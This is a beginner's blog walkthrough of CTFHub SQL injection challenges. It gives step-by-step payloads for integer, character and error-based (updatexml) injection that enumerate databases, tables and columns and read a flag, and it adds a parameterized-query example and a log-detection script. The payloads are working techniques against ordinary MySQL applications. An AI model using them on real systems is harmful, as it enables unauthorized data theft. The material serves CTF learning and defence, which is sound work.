Getting started with SQL injection

If you are a beginner like me and want to get started with SQL injection, you must first understand the basic SQL injection statements. That is the prerequisite knowledge; afterwards I will walk you through the CTFHub questions and their analysis. If anything here is mistaken, or if you have a better understanding, please feel free to leave feedback in the comments. Thank you!

Prerequisite knowledge

I will present the prerequisite knowledge in the form of a table. Please read it carefully.

Statement                    Meaning
union select                 UNION query; the basis of union-based injection
database()                   Returns the name of the current database
version()                    Returns the database server version, e.g. mysql 1.2.3
group_concat()               Concatenates the values of one group into a single string, joined by a separator (a comma by default)
information_schema           The built-in database that stores metadata about all databases, tables and columns
information_schema.schemata  Information about all databases
information_schema.tables    Information about all tables in every database
table_name                   The column of information_schema.tables that holds the table name
information_schema.columns   Information about all columns in every table
column_name                  The column of information_schema.columns that holds the column name
right(str,num)               Takes the rightmost num characters of the string str
left(str,num)                Same as above, but counted from the left
substr(str,N,M)              Takes M characters of str starting at character N

The injection process is like looking for the library first, then the table in the library, then the column in the table, and finally reading the column to get the data. (Personal understanding; if there is an error, please point it out right away.)

Integer injection

1. Determine whether injection exists (integer type)
1. Input: 1' (1 plus a single quote)
Result: the program raises an error
2. Input: 1 and 1=1
Result: the program behaves normally, the same page as when you entered 1
3. Input: 1 and 1=2
Result: the program raises an error
If all three observations hold, the URL parameter has integer injection.

2. Determine the number of columns in the query (here from large to small)
1. Input: 1 order by 2
Result: the same page as id=1
2. Input: 1 order by 3
Result: program error
3. So the query returns 2 columns.

3. Find the position where a SQL statement can be inserted
1. Input: -1 union select 1,2
Result: Data: 2 (a SQL statement can be injected in position 2)
Note: "-1" is an id that does not exist in the database, which guarantees the original query returns no row; union select 1,2 (a joint query) then shows which of the two positions is echoed on the page and can therefore carry the injected SQL statement.

4. Get the name of the current database
1. Input: -1 union select 1,database()
Result: Data: sqli, meaning the database name echoed in position 2 is "sqli"
Note: replace the 2 with database() so that the database name is returned in position 2

5. Get the table names in the database
Method one (get one table name per query)
1. Input: -1 union select 1,(select table_name from information_schema.tables where table_schema='sqli' limit 0,1)
Result: Data: news
2. Input: -1 union select 1,(select table_name from information_schema.tables where table_schema='sqli' limit 1,1)
Result: Data: flag
Note: just change the first number of "limit 0,1" to move on to the next table; each query returns one table
Method two (get all table names in the database at once)
1. Input: -1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
Result: Data: news, flag

6. Get the column names (in effect, look at what the "flag" table contains)
Method one (get one column per query)
1. Input: -1 union select 1,(select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1)
Result: Data: flag
Note: the next query works the same way as step 5, method one
Method two (get all columns at once)
1. Input: -1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'
Result: Data: flag

7. Get the data (read the column named 'flag' in the table)
Method one (get one row per query)
1. Input: -1 union select 1,(select flag from sqli.flag limit 0,1)
Result: the flag.
Note: querying the next row works the same way as method one above
Method two (get all the data in flag at once)
1. Input: -1 union select 1,group_concat(flag) from sqli.flag
Result: the flag
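As an added example (not code from the original post or from CTFHub), here is why the integer-injection probes above behave as described: the same inputs are run against a query that concatenates the id and against a parameterized one, using a constructed SQLite table whose name and columns are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the challenge database; the table and
# column names are assumptions, not taken from the CTFHub environment.
DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE news(id INTEGER, data TEXT);
    INSERT INTO news VALUES (1, 'ctfhub');
""")

def lookup_vulnerable(user_id: str):
    # The integer-injection case: the parameter is pasted straight into the SQL
    # text, so "1 and 1=2", "1 order by 3" and "-1 union select 1,2" all change
    # the statement instead of being compared against the id column.
    sql = "SELECT id, data FROM news WHERE id=" + user_id
    try:
        return DB.execute(sql).fetchall()
    except sqlite3.Error:
        return "error"  # the "program error" the walkthrough observes

def lookup_safe(user_id: str):
    # Hardened form: validate the expected type, then bind the value as a
    # parameter so it can never be parsed as part of the SQL statement.
    try:
        uid = int(user_id)
    except ValueError:
        return []
    return DB.execute("SELECT id, data FROM news WHERE id=?", (uid,)).fetchall()

if __name__ == "__main__":
    for probe in ["1", "1'", "1 and 1=1", "1 and 1=2", "1 order by 2",
                  "1 order by 3", "-1 union select 1,2"]:
        print(f"{probe!r:25} vulnerable={lookup_vulnerable(probe)!r:20} safe={lookup_safe(probe)!r}")
```

With the concatenated query the probes reproduce the "normal / error / union row" pattern from the steps above; the bound-parameter version returns the single row for "1" and nothing for everything else.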

Character injection

Before attempting the question, understand that in character injection you must deal with string closure: add a single quote after the 1 to close the string, and finish the payload with a comment, "-- " (two minus signs followed by a space). The space must not be dropped.

1. Determine whether injection exists
1. Input: 1'
Result: program error
2. Input: 1' and 1=1 -- '
Result: Data: ctfhub
3. Input: 1' and 1=2 -- '
Result: program error
If all three observations hold, the URL parameter has character injection.

2. Determine the number of columns in the select statement
1. Input: 1' order by 3 -- '
Result: Error
2. Input: 1' order by 2 -- '
Result: Correct
Note: So the select statement has 2 columns

3. Find the column that can carry the injected SQL statement
1. Input: $name=' union select 1,2 -- '
Result: Data: 2
Note: the SQL statement can be placed in the second column. Leaving the value empty before the quote (written here as $name=) plays the same role as -1 in the integer case: the original query matches nothing, so the previous row is not displayed.

4. Use functions to collect database information (user, database name, version, ...)
1. Input: $name=' union select 1,user() -- '
Result: Data: root@localhost
Note: because the query runs as the root user, the information_schema database can be read
2. Input: $name=' union select 1,database() -- '
Result: Data: sqli
Note: the current database is named sqli

Useful functions and variables:

Current user: user()
Current database: database()
Database version: version()
@@hostname: the server host name
@@datadir: the directory where the database files are stored
@@version: version

5. Query the database through union
1. Input: $name=' union select 1,group_concat(schema_name) from information_schema.schemata -- '
Result: Data: information_schema, mysql, performance_schema, sqli
Note: gets the names of all databases
2. Input: $name=' union select table_schema,count(*) from information_schema.tables -- '
Result: Data: 161
Note: counts how many tables there are in total
3. Input: $name=' union select table_schema,group_concat(table_name) from information_schema.tables where table_schema='sqli' -- '
Result: Data: new, flag
Note: view the table names in the sqli database (personally, I think the two steps above can be skipped)
4. Input: $name=' union select 1,(select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1) -- '
Result: Data: flag
Note: lists the columns of the flag table; query them one at a time, changing limit 0,1 to limit 1,1 for the second column

6. Query the contents of the columns in the specified database table
1. Input: $name=' union select 1,database() -- '
Result: the flag

Error-based injection

The difference from the integer and character types above is that as soon as you enter 1 you can tell this is error-based injection, so the format of the injection statement is different. We need the updatexml() function, so let me first introduce it.
UPDATEXML(XML_document, XPath_string, new_value). Simply put, the injection form is updatexml(document object, concat(0x7e, query statement, 0x7e), new value).
First parameter: XML_document, a string holding the XML document object name.
Second parameter: XPath_string, a string in XPath format.
Third parameter: new_value, a string that replaces the data matched by the XPath expression.

Since the second parameter of updatexml must be a string in XPath format, and content that starts with "~" is not valid XPath syntax, 0x7e (the "~" character) is used as the marker. concat() is only a string concatenation function, so the string it builds clearly violates the XPath rules; MySQL then reports an error whose message contains the result of the query inside the brackets, which is what makes error-based injection possible. The error message shows only the first 32 characters of that string, so a long result has to be read in pieces with left(), right() or substr().

1. Judgment
1. Input: 1
Result: Query is correct
2. Input: 1'
Result: Query error

2. Use the updatexml function for error-based injection
1. Input: 1 union select updatexml(1,concat(0x7e,database(),0x7e),1);
Result: the database name is returned in the error.
Note: why is it 1 here?

3. List the tables in the database
1. Input: 1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema="sqli"),0x7e),1);
Result: new, flag appears

4. View the columns in the flag table
1. Input: 1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema="sqli" and table_name="flag"),0x7e),1);
Result: Flag appears

5. View the flag
1. Input: 1 union select updatexml(1,concat(0x7e,(select(group_concat(flag))from sqli.flag),0x7e),1);
Result: only part of the flag appears.
Note: the echo is truncated, so we need the right or left function

6. Use the right function to echo the whole flag
1. Input: 1 union select updatexml(1,concat(0x7e,right((select(group_concat(flag))from sqli.flag),50),0x7e),1);
Result: the flag
Note: to master the right function you need to use it flexibly; I believe you can.
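From the defender's side, the probes used in all three sections above leave a recognisable trail in web server logs. Added example (not from the original post): a small scanner that URL-decodes each request and flags union/select, order-by column counting, and/or tautologies, information_schema lookups and updatexml payloads; the combined log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probe patterns this walkthrough uses; tune before deploying.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b[\s(]+(all\s+)?select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "tautology": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "schema_lookup": re.compile(r"information_schema\.(tables|columns|schemata)", re.I),
    "error_based": re.compile(r"\bupdatexml\s*\(", re.I),
}

# Apache/Nginx combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify(request_path):
    # URL-decode first so %27, %20 and '+' encodings hit the same rules.
    decoded = unquote_plus(request_path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan(lines):
    # Returns one (client ip, status, matched rules) tuple per suspicious request.
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = classify(m.group("path"))
        if rules:
            hits.append((m.group("ip"), m.group("status"), rules))
    return hits

# Constructed sample lines (not real traffic) replaying the page's probes.
# The bare "1'" probe on the second line matches no signature; only its 500
# status hints at it, so per-client error-rate alerting complements these rules.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2020:10:00:01 +0800] "GET /?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Dec/2020:10:00:02 +0800] "GET /?id=1%27 HTTP/1.1" 500 88',
    '203.0.113.5 - - [10/Dec/2020:10:00:03 +0800] "GET /?id=1%20and%201=2 HTTP/1.1" 200 40',
    '203.0.113.5 - - [10/Dec/2020:10:00:04 +0800] "GET /?id=1%20order%20by%203 HTTP/1.1" 500 88',
    '203.0.113.5 - - [10/Dec/2020:10:00:05 +0800] "GET /?id=-1%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables HTTP/1.1" 200 60',
    '203.0.113.5 - - [10/Dec/2020:10:00:06 +0800] "GET /?id=1%20union%20select%20updatexml(1,concat(0x7e,database(),0x7e),1) HTTP/1.1" 500 120',
]

if __name__ == "__main__":
    for ip, status, rules in scan(SAMPLE_LOG):
        print(ip, status, ",".join(rules))
```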

Starting from scratch takes patience and constant experimentation. Believe it or not, the blogger spent 3 to 4 hours on the first question, but slowly gained a sense of direction and feel for it afterwards, and each of the next two questions took less time than the one before. I believe you can do it too.

Origin blog.csdn.net/m0_52699073/article/details/111067844